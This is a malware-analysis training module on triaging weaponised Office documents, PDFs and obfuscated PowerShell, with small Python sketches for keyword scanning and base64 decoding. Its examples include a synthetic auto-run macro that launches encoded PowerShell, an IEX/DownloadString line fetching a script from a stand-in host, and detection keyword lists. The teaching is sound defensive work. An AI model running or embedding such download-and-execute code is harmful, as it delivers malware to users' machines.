Module 11: Document & Script Malware

Type 6 · Reconstruct: extract embedded macros from a .doc with olevba, flag suspicious objects in a PDF with pdfid, and decode a base64 PowerShell payload. Deliverable: an IOC summary with ATT&CK tagging (T1566.001, T1059.001) for each artifact. (Secondary: Misconception Reveal. An olevba score is triage priority, not a verdict.) Go to the hands-on lab →

Last reviewed: 2026-06

Malware Analysis — analyse the attack surface that reaches every inbox: weaponised Office files, PDFs, and obfuscated scripts.

Difficulty: Intermediate · Estimated time: ~3.5–5.5 hrs (study + lab) · Prerequisites: Foundations

In 60 seconds

Weaponised documents are a top initial-access vector not because the technique is clever but because the delivery is legitimate: Outlook opens the .docx, Adobe opens the PDF, PowerShell runs the script, and the malicious logic rides inside a trusted container. olevba (part of the oletools suite) and pdfid make triage tractable in minutes, but an olevba score is triage priority, not a verdict. The whole maldoc chain (macro → Shell → base64 PowerShell) decodes without ever executing the file, because base64 is encoding, not encryption.

Why this matters

Phishing with weaponised documents remains one of the top initial-access vectors year after year. The reason is not that the technique is sophisticated; it is that the delivery is legitimate. Outlook opens .docx files; Adobe opens PDFs; PowerShell runs scripts. The malicious logic rides inside a trusted container. An analyst who cannot triage a suspicious document is blocked at the most common entry point for enterprise intrusions. Tools like olevba (part of the oletools suite) and pdfid make this triage tractable in minutes. Emotet is the textbook maldoc chain: it spread for years through phishing emails carrying a Word document with a malicious VBA macro (T1566.001) that, on open, launched an obfuscated PowerShell downloader (T1059.001) to pull the payload. That is the precise macro → Shell/CreateObject → base64-PowerShell sequence this module triages. (The MITRE ATT&CK entry for Emotet, S0367, documents the spearphishing-attachment delivery and the PowerShell stage.)

Objective

Extract and analyse the embedded macros from a synthetic .doc file using olevba, identify suspicious objects in a synthetic PDF using pdfid, and decode a base64-obfuscated PowerShell script — producing an IOC summary and ATT&CK tagging for each.

The core idea

The mental model

The malicious logic rides inside a trusted container, so triage is about finding the attack surface inside it. Office files are compound formats: OLE2 for .doc/.xls, and Open XML zip archives for .docx/.xlsx and their macro-enabled variants .docm/.xlsm. In both cases macros live in OLE streams (for Open XML, inside the embedded vbaProject.bin) as compressed VBA source alongside compiled p-code. olevba extracts and decompresses the source and scores the high-risk bits: auto-execute handlers (AutoOpen, Document_Open), shell invocations (Shell, CreateObject("WScript.Shell")), string obfuscation, and network access.

flowchart LR
    D["phishing .doc"] --> A["VBA macro<br/>AutoOpen / Document_Open"]
    A --> SH["Shell / CreateObject<br/>(WScript.Shell)"]
    SH --> PS["base64 PowerShell<br/>downloader"]
    PS --> PL["fetch + run payload"]
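
To make the keyword-flagging idea concrete, here is a minimal sketch of the kind of scan described above, run on VBA source that has already been extracted. It is not olevba's implementation: the keyword tuples, the `scan_vba` helper, and the sample macro are all hypothetical and far shorter than the real indicator lists.

```python
import re

# Illustrative keyword sets only (assumption); olevba's real lists are much longer.
AUTOEXEC = ("AutoOpen", "Document_Open", "Auto_Open", "Workbook_Open")
SUSPICIOUS = ("Shell", "CreateObject", "WScript.Shell", "powershell", "FromBase64String")

# Synthetic macro text standing in for source extracted from a .doc.
SAMPLE_VBA = '''
Sub AutoOpen()
    Dim cmd As String
    cmd = "powershell -enc SQBFAFgA"
    CreateObject("WScript.Shell").Run cmd, 0
End Sub
'''


def scan_vba(source: str) -> dict:
    """Report which auto-execute and suspicious keywords occur in VBA source."""
    def hits(keywords):
        # VBA is case-insensitive, so the match is too; \b avoids partial words.
        return [kw for kw in keywords
                if re.search(r"\b" + re.escape(kw) + r"\b", source, re.IGNORECASE)]
    return {"autoexec": hits(AUTOEXEC), "suspicious": hits(SUSPICIOUS)}


report = scan_vba(SAMPLE_VBA)
# An auto-execute handler plus a shell invocation raises priority; it is not a verdict.
high_priority = bool(report["autoexec"]) and bool(report["suspicious"])
print(report, "high priority:", high_priority)
```

The scan never opens or runs the document; it only reads text, which is why a hit tells you where to start reading rather than what the macro does.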

The gotcha

The olevba score is a triage priority, not a verdict. A score above the warning threshold means "look more carefully," not "this is malicious" — benign documents with legitimate macros score too, and treating the number as a label produces both false alarms and false clears. The verdict comes from reading what the macro actually does, not from the heuristic total.

PDFs are more structurally permissive. The format supports JavaScript, embedded files (including executable PE binaries), and launch and URI actions, all within the PDF specification. pdfid counts the occurrences of high-risk PDF keywords: /JS and /JavaScript flag embedded JavaScript; /OpenAction and /AA flag automatic execution triggers; /EmbeddedFile flags an embedded file. /JS and /OpenAction appearing together is the strongest single triage signal for a malicious PDF, because benign PDFs rarely need both, but like the olevba score it is a reason to look closer rather than a verdict. pdfid only counts keywords; it does not extract or execute the JavaScript. For that, you would use pdf-parser or peepdf.
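
The counting approach can be sketched in a few lines of standard-library Python. This is a simplified stand-in for the idea, not pdfid itself: the `count_pdf_keywords` helper and the sample bytes are hypothetical, and the sketch ignores hex-escaped names and compressed object streams.

```python
import re

# Keywords named in the text above; the real tool reports more than these.
KEYWORDS = (b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/EmbeddedFile")

# Synthetic PDF fragment (not a complete, valid file) for illustration.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj\n"
)


def count_pdf_keywords(data: bytes) -> dict:
    """Count raw occurrences of each high-risk name in the PDF bytes."""
    counts = {}
    for kw in KEYWORDS:
        # Require a non-alphanumeric byte after the name so /JS does not
        # also match a longer name that merely starts with the same letters.
        pattern = re.escape(kw) + rb"(?![A-Za-z0-9])"
        counts[kw.decode("ascii")] = len(re.findall(pattern, data))
    return counts


counts = count_pdf_keywords(SAMPLE_PDF)
has_script = counts["/JS"] + counts["/JavaScript"] > 0
has_trigger = counts["/OpenAction"] + counts["/AA"] > 0
print(counts, "script with auto-trigger:", has_script and has_trigger)
```

A nonzero pair of counts here only says where to point pdf-parser next; the script body itself still has to be extracted and read.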

Go deeper: PowerShell obfuscation and the triage workflow

Most phishing chains end in a PowerShell stage — Emotet's macro spawned an obfuscated command that rebuilt its download URLs at runtime. The canonical idiom: a base64 blob, then [System.Convert]::FromBase64String() + [System.Text.Encoding]::Unicode.GetString(). This is encoding, not encryption — no key, so decoding is always possible once you find the blob. FromBase64String is your entry point; the decoded string is your next IOC. Full workflow: hash → olevba/pdfid to find the surface → extract the script → decode strings → identify the payload URL/filename. None of it requires executing the document.
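
The decode step can be reproduced outside PowerShell. The sketch below builds its own synthetic blob so nothing is hand-encoded, then decodes it as UTF-16LE, which is what the `Unicode` encoding in the idiom above refers to. The `decode_ps_blob` helper, the script text, and the `example.test` URL are assumptions made for illustration.

```python
import base64
import re


def decode_ps_blob(blob: str) -> str:
    """Decode a base64 blob the way FromBase64String + Unicode.GetString would."""
    raw = base64.b64decode(blob, validate=True)
    # PowerShell's "Unicode" encoding is UTF-16 little-endian.
    return raw.decode("utf-16-le")


# Synthetic payload; .test is a reserved TLD, so this URL resolves nowhere.
script = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"
blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")

decoded = decode_ps_blob(blob)
# Pull URL-shaped strings out of the decoded text as candidate IOCs.
urls = re.findall(r"https?://[^\s'\"]+", decoded)
print(decoded)
print(urls)
```

No key is involved at any point, which is the practical meaning of "encoding, not encryption". If a blob decodes to unreadable text, try UTF-8 or look for a second layer such as compression before assuming encryption.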

Learn (~2.5 hrs)

oletools and Office macro analysis

- decalage2/oletools, olevba documentation: the canonical reference; read the "Indicators" and "Output format" sections (~25 min).
- SANS ISC, "Maldoc Analysis with olevba" (diary): a real-world walkthrough on a phishing document; shows the full triage flow (~20 min).

PDF analysis

- pdfid documentation (Didier Stevens): explains the keyword counts and what each flag means; read "pdfid" and the "Usage" section (~20 min).
- MITRE ATT&CK T1566.001 (Phishing: Spearphishing Attachment): covers maldocs as an initial-access technique with real procedure examples (~15 min).

PowerShell obfuscation

- MITRE ATT&CK T1059.001 (Command and Scripting Interpreter: PowerShell): includes obfuscation sub-techniques and detection opportunities (~15 min).
- Emotet, MITRE ATT&CK S0367: the canonical maldoc family: spearphishing attachment (T1566.001) → VBA macro → obfuscated PowerShell downloader (T1059.001). Read its delivery techniques to anchor the triage chain in this module on a real campaign (~15 min).

Key concepts

olevba extracts VBA source and applies heuristic scoring — score is triage priority, not verdict.
Auto-execute handlers (AutoOpen, Document_Open) plus Shell/CreateObject is the highest-risk pattern.
/JS + /OpenAction together in a PDF is the primary maldoc signal; pdfid counts both.
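PowerShell base64 payloads commonly decode with FromBase64String, or arrive via the -EncodedCommand parameter with no decode call in the script at all; search for both, and treat whichever you find as your pivot.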
Full document-malware triage never requires executing the document.
ATT&CK: T1566.001 (phishing delivery), T1059.001 (PowerShell execution), T1027.010 (command obfuscation, which covers the obfuscated PowerShell stage).
Real worked family: Emotet (maldoc downloader). Its chain of phishing Word doc → VBA macro → obfuscated base64 PowerShell downloader is the exact one this module triages, drawn from a real high-volume campaign.
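
The lab deliverable, an IOC summary with ATT&CK tags per artifact, can be kept as a small structured record. The sketch below is one possible shape, not a required format: the `ArtifactSummary` schema, the file name, and the placeholder bytes are all hypothetical.

```python
import hashlib
import json
from dataclasses import asdict, dataclass, field


@dataclass
class ArtifactSummary:
    """One row of the IOC summary (hypothetical schema, not a standard)."""
    artifact: str
    sha256: str
    iocs: list = field(default_factory=list)
    attack: list = field(default_factory=list)
    notes: str = ""


# Stand-in bytes; in the lab you would hash the real sample file instead.
sample_bytes = b"synthetic maldoc placeholder"

summary = asdict(ArtifactSummary(
    artifact="invoice.doc",
    sha256=hashlib.sha256(sample_bytes).hexdigest(),
    iocs=["http://example.test/a.ps1"],
    attack=["T1566.001", "T1059.001"],
    notes="AutoOpen macro launches encoded PowerShell; verdict pending manual review.",
))
print(json.dumps(summary, indent=2))
```

Hashing first means every later finding is tied to an exact sample, and keeping the verdict in a free-text note keeps the heuristic hits separate from the analyst's conclusion.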

AI acceleration

Paste extracted VBA or decoded PowerShell into a model and prompt: "Analyse this script. List any IOCs (URLs, IPs, file paths), identify the likely payload delivery mechanism, and map the behaviour to ATT&CK technique IDs." Effective for rapid triage of long macro scripts. Verify any extracted URL by checking it against VirusTotal before using it in reporting — do not browse to it.

AI caveat

A model triages long macro/PowerShell scripts fast and pulls IOCs well, but the extracted URL is a lead, not a confirmed indicator — verify it via VirusTotal, and never browse to it from your analysis host.

Check yourself

Why is a weaponised document such a durable initial-access vector despite being unsophisticated?
An olevba score is high. What does that license you to conclude, and what does it not?
Why can a base64 PowerShell payload always be decoded statically, while a true encrypted blob cannot?
